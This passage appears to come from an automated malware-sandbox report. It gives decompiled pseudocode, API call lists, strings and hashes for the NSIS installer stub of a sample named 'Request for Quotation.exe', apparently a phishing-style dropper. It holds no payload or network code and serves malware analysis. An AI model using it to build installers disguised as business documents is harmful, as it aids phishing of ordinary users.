                                                                                								_t117 = _t117 & 0x0000fefd | 0x00000004;
                                                                                								__eflags = _t117;
                                                                                							}
                                                                                							ShowWindow(_t49, _t117 & 0x00000008);
                                                                                							EnableWindow( *(_t135 + 0x30), _t117 & 0x00000100);
                                                                                							E004042F3(_t117 & 0x00000002);
                                                                                							_t118 = _t117 & 0x00000004;
                                                                                							EnableWindow( *0x429880, _t118);
                                                                                							__eflags = _t118 - _t134;
                                                                                							if(_t118 == _t134) {
                                                                                								_push(1);
                                                                                							} else {
                                                                                								_push(_t134);
                                                                                							}
                                                                                							EnableMenuItem(GetSystemMenu(_t126, _t134), 0xf060, ??);
                                                                                							SendMessageA( *(_t135 + 0x38), 0xf4, _t134, 1);
                                                                                							__eflags =  *0x42f4ec - _t134;
                                                                                							if( *0x42f4ec == _t134) {
                                                                                								_push( *0x42a8b4);
                                                                                							} else {
                                                                                								SendMessageA(_t126, 0x401, 2, _t134);
                                                                                								_push( *0x429880);
                                                                                							}
                                                                                							E00404306();
                                                                                							E0040624D(0x42a8b8, E00403DDE());
                                                                                							E004062E0(0x42a8b8, _t126, _t131,  &(0x42a8b8[lstrlenA(0x42a8b8)]),  *((intOrPtr*)(_t131 + 0x18)));
                                                                                							SetWindowTextA(_t126, 0x42a8b8);
                                                                                							_push(_t134);
                                                                                							_t68 = E00401389( *((intOrPtr*)(_t131 + 8)));
                                                                                							__eflags = _t68;
                                                                                							if(_t68 != 0) {
                                                                                								continue;
                                                                                							} else {
                                                                                								__eflags =  *_t131 - _t134;
                                                                                								if( *_t131 == _t134) {
                                                                                									continue;
                                                                                								}
                                                                                								__eflags =  *(_t131 + 4) - 5;
                                                                                								if( *(_t131 + 4) != 5) {
                                                                                									DestroyWindow( *0x42ec18);
                                                                                									 *0x42a090 = _t131;
                                                                                									__eflags =  *_t131 - _t134;
                                                                                									if( *_t131 <= _t134) {
                                                                                										goto L58;
                                                                                									}
                                                                                									_t74 = CreateDialogParamA( *0x42f440,  *_t131 +  *0x42ec20 & 0x0000ffff, _t126,  *(0x40a1fc +  *(_t131 + 4) * 4), _t131);
                                                                                									__eflags = _t74 - _t134;
                                                                                									 *0x42ec18 = _t74;
                                                                                									if(_t74 == _t134) {
                                                                                										goto L58;
                                                                                									}
                                                                                									_push( *((intOrPtr*)(_t131 + 0x2c)));
                                                                                									_push(6);
                                                                                									E004042D1(_t74);
                                                                                									GetWindowRect(GetDlgItem(_t126, 0x3fa), _t135 + 0x10);
                                                                                									ScreenToClient(_t126, _t135 + 0x10);
                                                                                									SetWindowPos( *0x42ec18, _t134,  *(_t135 + 0x20),  *(_t135 + 0x20), _t134, _t134, 0x15);
                                                                                									_push(_t134);
                                                                                									E00401389( *((intOrPtr*)(_t131 + 0xc)));
                                                                                									__eflags =  *0x42ec0c - _t134; // 0x0
                                                                                									if(__eflags != 0) {
                                                                                										goto L61;
                                                                                									}
                                                                                									ShowWindow( *0x42ec18, 8);
                                                                                									E0040431D(0x405);
                                                                                									goto L58;
                                                                                								}
                                                                                								__eflags =  *0x42f4ec - _t134;
                                                                                								if( *0x42f4ec != _t134) {
                                                                                									goto L61;
                                                                                								}
                                                                                								__eflags =  *0x42f4e0 - _t134;
                                                                                								if( *0x42f4e0 != _t134) {
                                                                                									continue;
                                                                                								}
                                                                                								goto L61;
                                                                                							}
                                                                                						}
                                                                                						DestroyWindow( *0x42ec18);
                                                                                						 *0x42f448 = _t134;
                                                                                						EndDialog(_t126,  *0x429c88);
                                                                                						goto L58;
                                                                                					} else {
                                                                                						__eflags = _t35 - 1;
                                                                                						if(_t35 != 1) {
                                                                                							L33:
                                                                                							__eflags =  *_t131 - _t134;
                                                                                							if( *_t131 == _t134) {
                                                                                								goto L61;
                                                                                							}
                                                                                							goto L34;
                                                                                						}
                                                                                						_push(0);
                                                                                						_t87 = E00401389( *((intOrPtr*)(_t131 + 0x10)));
                                                                                						__eflags = _t87;
                                                                                						if(_t87 == 0) {
                                                                                							goto L33;
                                                                                						}
                                                                                						SendMessageA( *0x42ec18, 0x40f, 0, 1);
                                                                                						__eflags =  *0x42ec0c - _t134; // 0x0
                                                                                						return 0 | __eflags == 0x00000000;
                                                                                					}
                                                                                				} else {
                                                                                					_t126 = _a4;
                                                                                					_t134 = 0;
                                                                                					if(_t116 == 0x47) {
                                                                                						SetWindowPos( *0x42a898, _t126, 0, 0, 0, 0, 0x13);
                                                                                					}
                                                                                					if(_t116 == 5) {
                                                                                						asm("sbb eax, eax");
                                                                                						ShowWindow( *0x42a898,  ~(_a12 - 1) & _t116);
                                                                                					}
                                                                                					if(_t116 != 0x40d) {
                                                                                						__eflags = _t116 - 0x11;
                                                                                						if(_t116 != 0x11) {
                                                                                							__eflags = _t116 - 0x111;
                                                                                							if(_t116 != 0x111) {
                                                                                								L26:
                                                                                								return E00404338(_t116, _a12, _a16);
                                                                                							}
                                                                                							_t133 = _a12 & 0x0000ffff;
                                                                                							_t127 = GetDlgItem(_t126, _t133);
                                                                                							__eflags = _t127 - _t134;
                                                                                							if(_t127 == _t134) {
                                                                                								L13:
                                                                                								__eflags = _t133 - 1;
                                                                                								if(_t133 != 1) {
                                                                                									__eflags = _t133 - 3;
                                                                                									if(_t133 != 3) {
                                                                                										_t128 = 2;
                                                                                										__eflags = _t133 - _t128;
                                                                                										if(_t133 != _t128) {
                                                                                											L25:
                                                                                											SendMessageA( *0x42ec18, 0x111, _a12, _a16);
                                                                                											goto L26;
                                                                                										}
                                                                                										__eflags =  *0x42f4ec - _t134;
                                                                                										if( *0x42f4ec == _t134) {
                                                                                											_t100 = E0040140B(3);
                                                                                											__eflags = _t100;
                                                                                											if(_t100 != 0) {
                                                                                												goto L26;
                                                                                											}
                                                                                											 *0x429c88 = 1;
                                                                                											L21:
                                                                                											_push(0x78);
                                                                                											L22:
                                                                                											E004042AA();
                                                                                											goto L26;
                                                                                										}
                                                                                										E0040140B(_t128);
                                                                                										 *0x429c88 = _t128;
                                                                                										goto L21;
                                                                                									}
                                                                                									__eflags =  *0x40a1f8 - _t134; // 0xffffffff
                                                                                									if(__eflags <= 0) {
                                                                                										goto L25;
                                                                                									}
                                                                                									_push(0xffffffff);
                                                                                									goto L22;
                                                                                								}
                                                                                								_push(_t133);
                                                                                								goto L22;
                                                                                							}
                                                                                							SendMessageA(_t127, 0xf3, _t134, _t134);
                                                                                							_t104 = IsWindowEnabled(_t127);
                                                                                							__eflags = _t104;
                                                                                							if(_t104 == 0) {
                                                                                								goto L61;
                                                                                							}
                                                                                							goto L13;
                                                                                						}
                                                                                						SetWindowLongA(_t126, _t134, _t134);
                                                                                						return 1;
                                                                                					} else {
                                                                                						DestroyWindow( *0x42ec18);
                                                                                						 *0x42ec18 = _a12;
                                                                                						L58:
                                                                                						if( *0x42b8b8 == _t134) {
                                                                                							_t143 =  *0x42ec18 - _t134; // 0x0
                                                                                							if(_t143 != 0) {
                                                                                								ShowWindow(_t126, 0xa);
                                                                                								 *0x42b8b8 = 1;
                                                                                							}
                                                                                						}
                                                                                						L61:
                                                                                						return 0;
                                                                                					}
                                                                                				}
                                                                                			}


                                                                                APIs
                                                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403E39
                                                                                • ShowWindow.USER32(?), ref: 00403E56
                                                                                • DestroyWindow.USER32 ref: 00403E6A
                                                                                • SetWindowLongA.USER32 ref: 00403E86
                                                                                • GetDlgItem.USER32 ref: 00403EA7
                                                                                • SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403EBB
                                                                                • IsWindowEnabled.USER32(00000000), ref: 00403EC2
                                                                                • GetDlgItem.USER32 ref: 00403F70
                                                                                • GetDlgItem.USER32 ref: 00403F7A
                                                                                • KiUserCallbackDispatcher.NTDLL(?,000000F2,?,0000001C,000000FF), ref: 00403F94
                                                                                • SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00403FE5
                                                                                • GetDlgItem.USER32 ref: 0040408B
                                                                                • ShowWindow.USER32(00000000,?), ref: 004040AC
                                                                                • EnableWindow.USER32(?,?), ref: 004040BE
                                                                                • EnableWindow.USER32(?,?), ref: 004040D9
                                                                                • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 004040EF
                                                                                • EnableMenuItem.USER32 ref: 004040F6
                                                                                • SendMessageA.USER32(?,000000F4,00000000,00000001), ref: 0040410E
                                                                                • SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00404121
                                                                                • lstrlenA.KERNEL32(0042A8B8,?,0042A8B8,00000000), ref: 0040414B
                                                                                • SetWindowTextA.USER32(?,0042A8B8), ref: 0040415A
                                                                                • ShowWindow.USER32(?,0000000A), ref: 0040428E
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.642351925.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.642341918.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.642363195.0000000000408000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.642372741.000000000040A000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.642405848.000000000041D000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.642426353.000000000042C000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.642443972.0000000000435000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.642456295.0000000000438000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: Window$Item$MessageSend$EnableShow$Menu$CallbackDestroyDispatcherEnabledLongSystemTextUserlstrlen
                                                                                • String ID:
                                                                                • API String ID: 4050669955-0
                                                                                • Opcode ID: 0747cf473462c633210311af9825ea032a0e3c09bf9efde6129466eabca98a82
                                                                                • Instruction ID: d5b7a152eccfdaa35e4c53a1a76e60acfbe2d5449824965e5503988bb7e30882
                                                                                • Opcode Fuzzy Hash: 0747cf473462c633210311af9825ea032a0e3c09bf9efde6129466eabca98a82
                                                                                • Instruction Fuzzy Hash: 34C1E671604204ABDB216F62EE85E2B3BB8FB85349F40053EF641B51F0CB795892DB2D
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 96%
                                                                                			E00403A60(void* __eflags) {
                                                                                				intOrPtr _v4;
                                                                                				intOrPtr _v8;
                                                                                				int _v12;
                                                                                				void _v16;
                                                                                				void* __ebx;
                                                                                				void* __edi;
                                                                                				void* __esi;
                                                                                				intOrPtr* _t17;
                                                                                				void* _t25;
                                                                                				void* _t27;
                                                                                				int _t28;
                                                                                				void* _t31;
                                                                                				int _t34;
                                                                                				int _t35;
                                                                                				intOrPtr _t36;
                                                                                				int _t39;
                                                                                				char _t57;
                                                                                				CHAR* _t59;
                                                                                				signed char _t63;
                                                                                				CHAR* _t74;
                                                                                				intOrPtr _t76;
                                                                                				CHAR* _t81;
                                                                                
                                                                                				_t76 =  *0x42f454;
                                                                                				_t17 = E00406656(2);
                                                                                				_t84 = _t17;
                                                                                				if(_t17 == 0) {
                                                                                					_t74 = 0x42a8b8;
                                                                                					"1033" = 0x30;
                                                                                					 *0x436001 = 0x78;
                                                                                					 *0x436002 = 0;
                                                                                					E00406134(_t71, __eflags, 0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x42a8b8, 0);
                                                                                					__eflags =  *0x42a8b8;
                                                                                					if(__eflags == 0) {
                                                                                						E00406134(_t71, __eflags, 0x80000003, ".DEFAULT\\Control Panel\\International",  &M0040836A, 0x42a8b8, 0);
                                                                                					}
                                                                                					lstrcatA("1033", _t74);
                                                                                				} else {
                                                                                					E004061AB("1033",  *_t17() & 0x0000ffff);
                                                                                				}
                                                                                				E00403D25(_t71, _t84);
                                                                                				_t80 = "C:\\Users\\jones\\AppData\\Local\\Temp";
                                                                                				 *0x42f4e0 =  *0x42f45c & 0x00000020;
                                                                                				 *0x42f4fc = 0x10000;
                                                                                				if(E00405CD3(_t84, "C:\\Users\\jones\\AppData\\Local\\Temp") != 0) {
                                                                                					L16:
                                                                                					if(E00405CD3(_t92, _t80) == 0) {
                                                                                						E004062E0(0, _t74, _t76, _t80,  *((intOrPtr*)(_t76 + 0x118)));
                                                                                					}
                                                                                					_t25 = LoadImageA( *0x42f440, 0x67, 1, 0, 0, 0x8040); // executed
                                                                                					 *0x42ec28 = _t25;
                                                                                					if( *((intOrPtr*)(_t76 + 0x50)) == 0xffffffff) {
                                                                                						L21:
                                                                                						if(E0040140B(0) == 0) {
                                                                                							_t27 = E00403D25(_t71, __eflags);
                                                                                							__eflags =  *0x42f500;
                                                                                							if( *0x42f500 != 0) {
                                                                                								_t28 = E00405446(_t27, 0);
                                                                                								__eflags = _t28;
                                                                                								if(_t28 == 0) {
                                                                                									E0040140B(1);
                                                                                									goto L33;
                                                                                								}
                                                                                								__eflags =  *0x42ec0c; // 0x0
                                                                                								if(__eflags == 0) {
                                                                                									E0040140B(2);
                                                                                								}
                                                                                								goto L22;
                                                                                							}
                                                                                							ShowWindow( *0x42a898, 5); // executed
                                                                                							_t34 = E004065E8("RichEd20"); // executed
                                                                                							__eflags = _t34;
                                                                                							if(_t34 == 0) {
                                                                                								E004065E8("RichEd32");
                                                                                							}
                                                                                							_t81 = "RichEdit20A";
                                                                                							_t35 = GetClassInfoA(0, _t81, 0x42ebe0);
                                                                                							__eflags = _t35;
                                                                                							if(_t35 == 0) {
                                                                                								GetClassInfoA(0, "RichEdit", 0x42ebe0);
                                                                                								 *0x42ec04 = _t81;
                                                                                								RegisterClassA(0x42ebe0);
                                                                                							}
                                                                                							_t36 =  *0x42ec20; // 0x0
                                                                                							_t39 = DialogBoxParamA( *0x42f440, _t36 + 0x00000069 & 0x0000ffff, 0, E00403DFD, 0); // executed
                                                                                							E004039B0(E0040140B(5), 1);
                                                                                							return _t39;
                                                                                						}
                                                                                						L22:
                                                                                						_t31 = 2;
                                                                                						return _t31;
                                                                                					} else {
                                                                                						_t71 =  *0x42f440;
                                                                                						 *0x42ebe4 = E00401000;
                                                                                						 *0x42ebf0 =  *0x42f440;
                                                                                						 *0x42ebf4 = _t25;
                                                                                						 *0x42ec04 = 0x40a210;
                                                                                						if(RegisterClassA(0x42ebe0) == 0) {
                                                                                							L33:
                                                                                							__eflags = 0;
                                                                                							return 0;
                                                                                						}
                                                                                						SystemParametersInfoA(0x30, 0,  &_v16, 0);
                                                                                						 *0x42a898 = CreateWindowExA(0x80, 0x40a210, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x42f440, 0);
                                                                                						goto L21;
                                                                                					}
                                                                                				} else {
                                                                                					_t71 =  *(_t76 + 0x48);
                                                                                					_t86 = _t71;
                                                                                					if(_t71 == 0) {
                                                                                						goto L16;
                                                                                					}
                                                                                					_t74 = 0x42e3e0;
                                                                                					E00406134(_t71, _t86,  *((intOrPtr*)(_t76 + 0x44)), _t71,  *((intOrPtr*)(_t76 + 0x4c)) +  *0x42f498, 0x42e3e0, 0);
                                                                                					_t57 =  *0x42e3e0; // 0x43
                                                                                					if(_t57 == 0) {
                                                                                						goto L16;
                                                                                					}
                                                                                					if(_t57 == 0x22) {
                                                                                						_t74 = 0x42e3e1;
                                                                                						 *((char*)(E00405C10(0x42e3e1, 0x22))) = 0;
                                                                                					}
                                                                                					_t59 = lstrlenA(_t74) + _t74 - 4;
                                                                                					if(_t59 <= _t74 || lstrcmpiA(_t59, ?str?) != 0) {
                                                                                						L15:
                                                                                						E0040624D(_t80, E00405BE5(_t74));
                                                                                						goto L16;
                                                                                					} else {
                                                                                						_t63 = GetFileAttributesA(_t74);
                                                                                						if(_t63 == 0xffffffff) {
                                                                                							L14:
                                                                                							E00405C2C(_t74);
                                                                                							goto L15;
                                                                                						}
                                                                                						_t92 = _t63 & 0x00000010;
                                                                                						if((_t63 & 0x00000010) != 0) {
                                                                                							goto L15;
                                                                                						}
                                                                                						goto L14;
                                                                                					}
                                                                                				}
                                                                                			}


























                                                                                APIs
                                                                                  • Part of subcall function 00406656: GetModuleHandleA.KERNEL32(?,?,?,004034F9,0000000B), ref: 00406668
                                                                                  • Part of subcall function 00406656: GetProcAddress.KERNEL32(00000000,?), ref: 00406683
                                                                                • lstrcatA.KERNEL32(1033,0042A8B8,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A8B8,00000000,00000002,73BCFA90,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Request for Quotation.exe" ,00000000), ref: 00403ADB
                                                                                • lstrlenA.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Temp,1033,0042A8B8,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A8B8,00000000,00000002,73BCFA90), ref: 00403B50
                                                                                • lstrcmpiA.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Temp,1033,0042A8B8,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A8B8,00000000), ref: 00403B63
                                                                                • GetFileAttributesA.KERNEL32(Call), ref: 00403B6E
                                                                                • LoadImageA.USER32 ref: 00403BB7
                                                                                  • Part of subcall function 004061AB: wsprintfA.USER32 ref: 004061B8
                                                                                • RegisterClassA.USER32 ref: 00403BF4
                                                                                • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 00403C0C
                                                                                • CreateWindowExA.USER32 ref: 00403C41
                                                                                • ShowWindow.USER32(00000005,00000000), ref: 00403C77
                                                                                • GetClassInfoA.USER32 ref: 00403CA3
                                                                                • GetClassInfoA.USER32 ref: 00403CB0
                                                                                • RegisterClassA.USER32 ref: 00403CB9
                                                                                • DialogBoxParamA.USER32 ref: 00403CD8
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.642351925.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.642341918.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.642363195.0000000000408000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.642372741.000000000040A000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.642405848.000000000041D000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.642426353.000000000042C000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.642443972.0000000000435000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.642456295.0000000000438000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                • String ID: "C:\Users\user\Desktop\Request for Quotation.exe" $.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb$B
                                                                                • API String ID: 1975747703-2889978477
                                                                                • Opcode ID: ab99cccd9c0ddd3d495b147680853500dcd9db92bcd335ab5c1b079dcb87365f
                                                                                • Instruction ID: 8734c0f5f73e26911640e72846d54346a9337973c4420bd4a4a6803de24d7ebf
                                                                                • Opcode Fuzzy Hash: ab99cccd9c0ddd3d495b147680853500dcd9db92bcd335ab5c1b079dcb87365f
                                                                                • Instruction Fuzzy Hash: 1B61C6702042007EE620BF669D46F373AACDB4474DF94443FF945B62E2CA7DA9068A2D
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 96%
                                                                                			E00402EF1(void* __eflags, signed int _a4) {
                                                                                				long _v8;
                                                                                				long _v12;
                                                                                				intOrPtr _v16;
                                                                                				long _v20;
                                                                                				intOrPtr _v24;
                                                                                				intOrPtr _v28;
                                                                                				intOrPtr _v32;
                                                                                				intOrPtr _v36;
                                                                                				signed int _v40;
                                                                                				char _v300;
                                                                                				long _t54;
                                                                                				void* _t62;
                                                                                				intOrPtr _t65;
                                                                                				void* _t68;
                                                                                				intOrPtr* _t70;
                                                                                				long _t82;
                                                                                				signed int _t89;
                                                                                				intOrPtr _t92;
                                                                                				intOrPtr _t100;
                                                                                				void* _t104;
                                                                                				intOrPtr _t105;
                                                                                				long _t106;
                                                                                				long _t109;
                                                                                				intOrPtr* _t110;
                                                                                
                                                                                				_v8 = 0;
                                                                                				_v12 = 0;
                                                                                				 *0x42f450 = GetTickCount() + 0x3e8;
                                                                                				GetModuleFileNameA(0, "C:\\Users\\jones\\Desktop\\Request for Quotation.exe", 0x400);
                                                                                				_t104 = E00405DE6("C:\\Users\\jones\\Desktop\\Request for Quotation.exe", 0x80000000, 3);
                                                                                				 *0x40a018 = _t104;
                                                                                				if(_t104 == 0xffffffff) {
                                                                                					return "Error launching installer";
                                                                                				}
                                                                                				E0040624D("C:\\Users\\jones\\Desktop", "C:\\Users\\jones\\Desktop\\Request for Quotation.exe");
                                                                                				E0040624D(0x437000, E00405C2C("C:\\Users\\jones\\Desktop"));
                                                                                				_t54 = GetFileSize(_t104, 0);
                                                                                				 *0x429470 = _t54;
                                                                                				_t109 = _t54;
                                                                                				if(_t54 <= 0) {
                                                                                					L22:
                                                                                					E00402E52(1);
                                                                                					if( *0x42f458 == 0) {
                                                                                						goto L30;
                                                                                					}
                                                                                					if(_v12 == 0) {
                                                                                						L26:
                                                                                						_t110 = GlobalAlloc(0x40, _v20);
                                                                                						_t105 = 8;
                                                                                						 *0x415458 = 0x40d450;
                                                                                						 *0x415454 = 0x40d450;
                                                                                						 *0x40b8b0 = _t105;
                                                                                						 *0x40bdcc = 0;
                                                                                						 *0x40bdc8 = 0;
                                                                                						 *0x415450 = 0x415450; // executed
                                                                                						E00405E15( &_v300, "C:\\Users\\jones\\AppData\\Local\\Temp\\"); // executed
                                                                                						_t62 = CreateFileA( &_v300, 0xc0000000, 0, 0, 2, 0x4000100, 0); // executed
                                                                                						 *0x40a01c = _t62;
                                                                                						if(_t62 != 0xffffffff) {
                                                                                							_t65 = E0040343E( *0x42f458 + 0x1c);
                                                                                							 *0x429474 = _t65;
                                                                                							 *0x429468 = _t65 - ( !_v40 & 0x00000004) + _v16 - 0x1c; // executed
                                                                                							_t68 = E004031B7(_v16, 0xffffffff, 0, _t110, _v20); // executed
                                                                                							if(_t68 == _v20) {
                                                                                								 *0x42f454 = _t110;
                                                                                								 *0x42f45c =  *_t110;
                                                                                								if((_v40 & 0x00000001) != 0) {
                                                                                									 *0x42f460 =  *0x42f460 + 1;
                                                                                								}
                                                                                								_t45 = _t110 + 0x44; // 0x44
                                                                                								_t70 = _t45;
                                                                                								_t100 = _t105;
                                                                                								do {
                                                                                									_t70 = _t70 - _t105;
                                                                                									 *_t70 =  *_t70 + _t110;
                                                                                									_t100 = _t100 - 1;
                                                                                								} while (_t100 != 0);
                                                                                								 *((intOrPtr*)(_t110 + 0x3c)) =  *0x429464;
                                                                                								E00405DA1(0x42f480, _t110 + 4, 0x40);
                                                                                								return 0;
                                                                                							}
                                                                                							goto L30;
                                                                                						}
                                                                                						return "Error writing temporary file. Make sure your temp folder is valid.";
                                                                                					}
                                                                                					E0040343E( *0x429460);
                                                                                					if(E00403428( &_a4, 4) == 0 || _v8 != _a4) {
                                                                                						goto L30;
                                                                                					} else {
                                                                                						goto L26;
                                                                                					}
                                                                                				} else {
                                                                                					do {
                                                                                						_t106 = _t109;
                                                                                						asm("sbb eax, eax");
                                                                                						_t82 = ( ~( *0x42f458) & 0x00007e00) + 0x200;
                                                                                						if(_t109 >= _t82) {
                                                                                							_t106 = _t82;
                                                                                						}
                                                                                						if(E00403428(0x421460, _t106) == 0) {
                                                                                							E00402E52(1);
                                                                                							L30:
                                                                                							return "Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
                                                                                						}
                                                                                						if( *0x42f458 != 0) {
                                                                                							if((_a4 & 0x00000002) == 0) {
                                                                                								E00402E52(0);
                                                                                							}
                                                                                							goto L19;
                                                                                						}
                                                                                						E00405DA1( &_v40, 0x421460, 0x1c);
                                                                                						_t89 = _v40;
                                                                                						if((_t89 & 0xfffffff0) == 0 && _v36 == 0xdeadbeef && _v24 == 0x74736e49 && _v28 == 0x74666f73 && _v32 == 0x6c6c754e) {
                                                                                							_a4 = _a4 | _t89;
                                                                                							 *0x42f500 =  *0x42f500 | _a4 & 0x00000002;
                                                                                							_t92 = _v16;
                                                                                							 *0x42f458 =  *0x429460;
                                                                                							if(_t92 > _t109) {
                                                                                								goto L30;
                                                                                							}
                                                                                							if((_a4 & 0x00000008) != 0 || (_a4 & 0x00000004) == 0) {
                                                                                								_v12 = _v12 + 1;
                                                                                								_t109 = _t92 - 4;
                                                                                								if(_t106 > _t109) {
                                                                                									_t106 = _t109;
                                                                                								}
                                                                                								goto L19;
                                                                                							} else {
                                                                                								goto L22;
                                                                                							}
                                                                                						}
                                                                                						L19:
                                                                                						if(_t109 <  *0x429470) {
                                                                                							_v8 = E0040670D(_v8, 0x421460, _t106);
                                                                                						}
                                                                                						 *0x429460 =  *0x429460 + _t106;
                                                                                						_t109 = _t109 - _t106;
                                                                                					} while (_t109 != 0);
                                                                                					goto L22;
                                                                                				}
                                                                                			}




























                                                                                APIs
                                                                                • GetTickCount.KERNEL32 ref: 00402F05
                                                                                • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\Request for Quotation.exe,00000400), ref: 00402F21
                                                                                  • Part of subcall function 00405DE6: GetFileAttributesA.KERNELBASE(00000003,00402F34,C:\Users\user\Desktop\Request for Quotation.exe,80000000,00000003), ref: 00405DEA
                                                                                  • Part of subcall function 00405DE6: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405E0C
                                                                                • GetFileSize.KERNEL32(00000000,00000000,00437000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Request for Quotation.exe,C:\Users\user\Desktop\Request for Quotation.exe,80000000,00000003), ref: 00402F6A
                                                                                • GlobalAlloc.KERNEL32(00000040,0040A130), ref: 004030AF
                                                                                Strings
                                                                                • C:\Users\user\Desktop\Request for Quotation.exe, xrefs: 00402F0B, 00402F1A, 00402F2E, 00402F4B
                                                                                • Error writing temporary file. Make sure your temp folder is valid., xrefs: 0040311C
                                                                                • "C:\Users\user\Desktop\Request for Quotation.exe" , xrefs: 00402EF1
                                                                                • Error launching installer, xrefs: 00402F41
                                                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 00402EFB, 004030CF
                                                                                • C:\Users\user\Desktop, xrefs: 00402F4C, 00402F51, 00402F57
                                                                                • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 0040316A
                                                                                • Null, xrefs: 00402FEA
                                                                                • soft, xrefs: 00402FE1
                                                                                • Inst, xrefs: 00402FD8
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.642351925.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.642341918.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.642363195.0000000000408000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.642372741.000000000040A000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.642405848.000000000041D000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.642426353.000000000042C000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.642443972.0000000000435000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.642456295.0000000000438000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                                                • String ID: "C:\Users\user\Desktop\Request for Quotation.exe" $C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\Request for Quotation.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
                                                                                • API String ID: 2803837635-1168965781
                                                                                • Opcode ID: c7140cee4d51e81b519843824b21cc99042816bf3a65f540c359333e0c5614f7
                                                                                • Instruction ID: e8b4360117e31fb5ea1b260af931ada4a8b54667cc236f60df091846fad1fe42
                                                                                • Opcode Fuzzy Hash: c7140cee4d51e81b519843824b21cc99042816bf3a65f540c359333e0c5614f7
                                                                                • Instruction Fuzzy Hash: B471D171A00204ABDB20AF64DD45B9A7BB8EB14719F60803BE505BB2D1D77CAE468B5C
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 75%
                                                                                			E00401759(FILETIME* __ebx, void* __eflags) {
                                                                                				void* _t33;
                                                                                				void* _t41;
                                                                                				void* _t43;
                                                                                				FILETIME* _t49;
                                                                                				FILETIME* _t62;
                                                                                				void* _t64;
                                                                                				signed int _t70;
                                                                                				FILETIME* _t71;
                                                                                				FILETIME* _t75;
                                                                                				signed int _t77;
                                                                                				void* _t80;
                                                                                				CHAR* _t82;
                                                                                				void* _t85;
                                                                                
                                                                                				_t75 = __ebx;
                                                                                				_t82 = E00402BCE(0x31);
                                                                                				 *(_t85 - 8) = _t82;
                                                                                				 *(_t85 + 8) =  *(_t85 - 0x28) & 0x00000007;
                                                                                				_t33 = E00405C52(_t82);
                                                                                				_push(_t82);
                                                                                				if(_t33 == 0) {
                                                                                					lstrcatA(E00405BE5(E0040624D(0x40a450, "C:\\Users\\jones\\AppData\\Local\\Temp")), ??);
                                                                                				} else {
                                                                                					_push(0x40a450);
                                                                                					E0040624D();
                                                                                				}
